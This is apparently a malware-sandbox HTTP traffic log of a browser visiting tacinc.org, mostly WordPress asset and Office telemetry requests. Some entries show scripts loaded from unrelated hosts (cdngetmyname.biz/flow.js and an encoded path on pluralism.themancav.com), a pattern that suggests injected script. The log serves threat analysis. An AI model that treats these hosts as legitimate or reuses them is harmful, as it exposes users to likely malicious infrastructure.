Source: global trafficHTTP traffic detected: GET /wp-content/themes/tac-child/css/fonts/lora-v16-latin-700.woff2 HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.tacinc.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.tacinc.org/wp-content/uploads/hummingbird-assets/882817933c266f0cbbf21908d5879b38.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /flow.js HTTP/1.1Host: cdngetmyname.bizConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /analytics.js HTTP/1.1Host: stats.wpmucdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tac-child/images/search-icon.svg HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tacinc.org/wp-content/uploads/hummingbird-assets/882817933c266f0cbbf21908d5879b38.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/elementor/css/post-865.css HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/powerpack-elements/assets/css/min/frontend.min.css HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/css/widget-heading.min.css HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/css/widget-text-editor.min.css HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/css/widget-spacer.min.css HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /flow.js HTTP/1.1Host: cdngetmyname.bizConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/socialdriver/css/fontawesome/css/all.min.css HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/socialdriver/css/style-spb.min.css HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/hummingbird-assets/0b1483fafd54a25959314aaba369349f.css HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tac-child/images/search-icon.svg HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /0M/mravthcS07dyf5vvKj6Lt3I+9upDGv7qSz7mqide/oZ+PrQ== HTTP/1.1Host: pluralism.themancav.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/elementor/css/post-815.css HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/elementor/css/post-2444.css HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/hummingbird-assets/a0e9216368a65f19aaba6582fba739f2.js HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
Source: global trafficHTTP traffic detected: GET /wp-includes/js/underscore.min.js HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
Source: global trafficHTTP traffic detected: GET /wp-content/themes/socialdriver/js/functions-spb.min.js HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/hummingbird-assets/c32f45114cc801a4d6b3b663b88bcf96.js HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /analytics.js HTTP/1.1Host: stats.wpmucdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/socialdriver/css/fontawesome/webfonts/fa-brands-400.woff2 HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.tacinc.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.tacinc.org/wp-content/themes/socialdriver/css/fontawesome/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
Source: global trafficHTTP traffic detected: GET /wp-content/themes/socialdriver/css/fontawesome/webfonts/fa-solid-900.woff2 HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.tacinc.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.tacinc.org/wp-content/themes/socialdriver/css/fontawesome/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/js/webpack.runtime.min.js HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/js/frontend-modules.min.js HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/hummingbird-assets/a0e9216368a65f19aaba6582fba739f2.js HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
Source: global trafficHTTP traffic detected: GET /wp-includes/js/underscore.min.js HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/hummingbird-assets/c32f45114cc801a4d6b3b663b88bcf96.js HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/core.min.js HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/js/webpack.runtime.min.js HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _ga=GA1.2.2026524419.1729706650; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/js/frontend.min.js HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _ga=GA1.2.2026524419.1729706650; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/hummingbird-assets/6419b4d897e8dc5284378e8acb00aa04.js HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _ga=GA1.2.2026524419.1729706650; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1
